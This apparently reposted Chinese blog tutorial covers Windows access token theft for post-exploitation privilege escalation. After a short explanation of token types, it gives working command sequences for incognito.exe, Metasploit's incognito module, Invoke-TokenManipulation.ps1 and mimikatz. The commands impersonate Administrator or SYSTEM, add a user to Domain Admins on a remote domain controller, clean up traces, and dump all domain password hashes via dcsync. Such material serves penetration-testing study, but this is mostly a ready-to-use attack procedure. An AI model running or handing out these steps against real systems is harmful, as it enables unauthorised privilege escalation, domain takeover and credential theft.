windows—令牌窃取

令牌的定义

令牌是描述进程或者线程安全上下文的一个对象。不同的用户登录计算机后, 都会生成一个Access Token,这个Token在用户创建进程或者线程时会被使用,不断的拷贝,这也就解释了A用户创建一个进程而该进程没有B用户的权限。一般用户双击运行一个进程都会拷贝explorer.exe的Access Token。

Windows下的访问令牌分为:
* 授权令牌(Delegation token):交互式会话登陆(例:本地用户登陆、用户桌面等)
* 模拟令牌(Impersonation token):非交互式登陆(例:net use 访问共享文件)

两种token只有在系统重启后才会清除;授权令牌在用户注销后,该令牌会变为模拟令牌依旧有效
以上简单理解就是, 当前系统中的某个进程或线程能访问到什么样的系统资源,完全取决于你当前进程是拿着谁的令牌。

Windows Access Token产生过程

用户使用凭据(用户密码)进行认证-->登录session创建-->windows返回用户的sid和用户所在组的sid-->LSA创建一个Access token-->使用凭据成功认证-->登录session-->token-->进程、线程

在获取到了服务器shell后,我们只能枚举出当前用户和比 当前用户权限更低用户的令牌。令牌的数量取决于当前shell的访问级别,如果当前的shell是administrator或者是system,我们就可以看到系统中的所有的令牌。
所以想要获得管理员的令牌,就需要对shell进行提权,也可以理解为先提权,后令牌窃取

在现实提权过程中,我们使用exp或永恒之蓝等能够直接提权到system,但假如我们利用mimikatz和hashdump不能获得administrator用户的密码,那我们只能通过令牌窃取进行降权,获得administrator用户的shell,从而以administrator用户的身份启动某些服务(因为某些服务只能通过administrator用户启动)。

令牌窃取工具:

cs、msf、empire、incognito.exe

令牌窃取实战:

incognito窃取令牌

incognito.exe下载

https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip

上传incognito.exe到服务器可执行目录中
执行文件,列出用户的token

incognito.exe list_tokens -u

可以看到只有当前用户的token,无法窃取比当前用户权限高的token
windows—令牌窃取_第1张图片

切换到管理员账户进行窃取
可以看到获取到了管理员的令牌
windows—令牌窃取_第2张图片

使用获取到的令牌执行命令

incognito.exe execute -c "LG-85EFB2724B8C\Administrator" calc.exe

其他命令

通过IPC远程列举tokens

incognito.exe -h IP|IP_list.txt -u administrator -p Password1 -g list_tokens -u

# 以指定token执行命令
incognito.exe execute -c "NT AUTHORITY\SYSTEM" xx.exe 

# 指定远程登录的账号试图登录并列举所hosts.txt里主机所有的token,将test用户加入到域管理员组
incognito.exe -f hosts.txt -u administrator -p Password -n 20 add_group_user -h dc1.corp.target.net "Domain Admins" test 

# 指定域用户执行命令
incognito.exe execute "domain\administrator" "cmd" 

# 清理痕迹
incognito.exe -h x.x.x.x -u administrator -p Password cleanup 

MSF窃取令牌

自己搭建实验的话可使用msfvenom生成一个反弹shell
获取到一个meterpreter后,使用 incognito 窃取令牌

##加载incognito
load incognito        
list_tokens -u

获取到了管理员的令牌
windows—令牌窃取_第3张图片

使用管理员令牌
注意:这里输入主机名\用户名时需要使用两个反斜杠 \

impersonate_token "LG-85EFB2724B8C\\Administrator"

在这里插入图片描述

执行完命令后,通过以下命令返回之前的token

rev2self 
##或
drop_token

Invoke-TokenManipulation.ps1 窃取令牌

# 列举token
1. Invoke-TokenManipulation -Enumerate 

# 提权至system
2. Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authority\system" 

# 复制进程token
3. Invoke-TokenManipulation -CreateProcess "cmd.exe" -ProcessId 500 

# 复制线程token
4. Invoke-TokenManipulation -CreateProcess "cmd.exe" -ThreadId 500

Mimikatz.exe

##二进制文件下载地址
https://github.com/gentilkiwi/mimikatz/releases

执行文件,查看当前令牌

C:\.....> mimikatz.exe
mimikatz# token::whoami

windows—令牌窃取_第4张图片

##列出所有令牌
mimikatz# token::list
##把当前权限提升为system
mimikatz# token::elevate

windows—令牌窃取_第5张图片

##模拟域管理员令牌
##搭建的机子未开启域,所以没有模拟成功
mimikatz# token::Elevate /domainadmin
##导出域控种的所有用户的密码 hash,如果没有没有权限会报错
mimikatz# lsadump::dcsync /domain:rootkit.org /all /csv
##还原令牌到初始状态
mimikatz# token::revert

参考:

http://t3ngyu.leanote.com/post/Windows-Access
https://hackergu.com/powerup-stealtoken-rottenpotato/

你可能感兴趣的:(渗透测试,windows,网络安全)